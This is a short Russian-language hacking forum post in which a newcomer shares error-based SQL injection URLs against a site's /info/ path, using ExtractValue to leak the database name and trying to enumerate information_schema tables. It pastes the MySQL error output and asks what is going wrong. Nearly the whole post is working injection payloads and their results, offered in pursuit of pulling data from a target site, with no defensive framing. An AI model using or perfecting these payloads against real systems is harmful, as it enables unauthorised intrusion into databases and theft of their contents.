
29.08.2016, 02:26
|
|
Новичок
Регистрация: 27.08.2016
Сообщений: 16
С нами:
5111606
Репутация:
0
|
|
Код:
http://site.ru/info/1'or(ExtractValue(1,concat(0x3a,(select(database())))))='1
Выводит...
Подскажите как извлечь инфу из Information.schema.. На примере этого запроса...
Пробывал так:
Код:
http://site.ru/info/1'or(extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))+--+
выводит такую ошибку:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+information_schema.tables+limit+0,1)))+--+') = 0 ) OR baner.id_baner IN (SE' at line 1
При запросе:
Код:
http://site.ru/info/1'and(extractvalue(1,concat(0x3a,(select(table_name)from(information_schema.tables)))))='1
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row
Шо не так делаю?
|
|
|